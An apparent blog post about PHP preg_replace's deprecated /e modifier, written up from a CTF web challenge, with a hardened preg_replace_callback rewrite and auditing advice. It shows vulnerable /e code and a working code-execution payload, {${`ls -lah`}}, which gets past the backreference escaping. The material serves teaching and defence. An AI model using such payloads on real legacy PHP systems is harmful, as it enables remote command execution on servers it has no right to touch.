
Unexpected Dangers of preg_replace

Code execution

Posted by Heeraj on February 23, 2016


There is a real chance of remote code execution in PHP web applications through improper handling of PCRE (Perl Compatible Regular Expressions). PCRE is what backs PHP's preg functions such as preg_match and preg_replace. They are safe most of the time; the one case that is not is the /e modifier, which makes preg_replace evaluate the replacement string as PHP code after the backreferences have been substituted into it. (The /e modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0.0; preg_replace_callback is the supported alternative, but /e is still found in legacy code running on old interpreters.)

<?php
$string = "You are in i4info";
// With /e the replacement 'strtoupper("\\1")' is evaluated as PHP code,
// with \1 replaced by the captured subject.
print preg_replace('/(.*)/e', 'strtoupper("\\1")', $string);
?>

The output is "YOU ARE IN I4INFO". The important point is that the replacement string is evaluated, so preg_replace with /e can end up calling any PHP function, including one chosen by whoever controls the subject string. Try feeding it a function call instead of a sentence:

<?php
$string = "system('ls -lah')";
// The subject is user-controlled; it is substituted into the evaluated code.
print preg_replace('/(.*)/e', 'strtoupper("\\1")', $string);
?>

Here system('ls -lah') becomes system(\'ls -lah\') in the evaluated code, because preg_replace backslash-escapes single quotes, double quotes, backslashes and NUL bytes in substituted backreferences. The quotes therefore cannot close strtoupper's double-quoted argument, and the command is merely uppercased instead of run. So another route is needed. Every other character passes through untouched, and that includes PHP's backtick operator, which runs a shell command ("`ls -lah`"). Backticks on their own are still plain text inside the double-quoted argument, which is why a working payload combines them with the curly-brace expression syntax that double-quoted strings support, as in {${`ls -lah`}}: the expression inside is evaluated during interpolation and the command executes. Nothing in that payload needs a quote, a backslash or a NUL byte, so the escaping never fires.
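The following is an added example, not code from the original post. It puts the vulnerable /e pattern beside its preg_replace_callback replacement, emulates the backreference escaping described above so you can see which characters survive, and runs the three subjects from this post through both. The function names and the emulation are my own; it needs PHP 7.1 or later for the nullable return type, and on such versions the /e call simply returns NULL.

```php
<?php
// Added example, not the original post's code. Shows the safe replacement
// for the /e modifier and why quote escaping stops system('ls -lah') but
// not a payload built from backticks and curly-brace interpolation.
// Function names below are assumptions made for this example.

// The post's vulnerable pattern. /e only exists on PHP < 7.0; on PHP >= 7.0
// preg_replace() emits a warning and returns NULL (warning silenced with @).
function upper_with_e_modifier(string $subject): ?string
{
    return @preg_replace('/(.*)/e', 'strtoupper("\\1")', $subject);
}

// Hardened equivalent: preg_replace_callback() hands the match array to a
// real PHP closure. The subject is only ever data; nothing in it is evaluated.
function upper_with_callback(string $subject): string
{
    return preg_replace_callback(
        '/(.*)/',
        static function (array $m): string {
            return strtoupper($m[1]);
        },
        $subject
    );
}

// Illustration (not PHP's own implementation) of the escaping /e applied to
// substituted backreferences: single quote, double quote, backslash and NUL
// get a leading backslash. Everything else, including $, {, } and backticks,
// passes through unchanged. strtr() with an array is single-pass, so the
// added backslashes are not re-escaped.
function e_modifier_backref_escape(string $s): string
{
    return strtr($s, [
        '\\' => '\\\\',
        "'"  => "\\'",
        '"'  => '\\"',
        "\0" => '\\0',
    ]);
}

// For each subject, build the PHP code /e would have evaluated and show what
// the hardened version returns instead. The subjects are constructed inputs.
function compare(array $subjects): array
{
    $rows = [];
    foreach ($subjects as $subject) {
        $rows[$subject] = [
            'code_evaluated_by_e' => 'strtoupper("' . e_modifier_backref_escape($subject) . '")',
            'callback_result'     => upper_with_callback($subject),
        ];
    }
    return $rows;
}

foreach (compare([
    'You are in i4info',
    "system('ls -lah')",
    '{${`ls -lah`}}',   // single quotes: no interpolation happens here
]) as $subject => $row) {
    printf("subject      : %s\n", $subject);
    printf("  /e evaluates: %s\n", $row['code_evaluated_by_e']);
    printf("  callback    : %s\n\n", $row['callback_result']);
}

if (upper_with_e_modifier('x') === null) {
    echo "This PHP build has no /e modifier; the vulnerable call returns NULL.\n";
}
```

The second subject shows the post's observation directly: the evaluated code is strtoupper("system(\'ls -lah\')"), a harmless string. The third shows that {${`ls -lah`}} reaches the evaluated code unchanged, which is exactly the shape an /e exploit takes on an old interpreter. The callback column is the same for all three: uppercased text and nothing else, because the closure receives the match as an argument rather than pasting it into source code. When auditing legacy PHP, grep for preg_replace calls whose pattern ends in a modifier set containing e and rewrite them this way; on PHP 7 and later the call already fails, so a site that still depends on it is by definition running an unsupported interpreter.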

This was one of the web problems in the Internetwache CTF.

Thank you for reading the blog!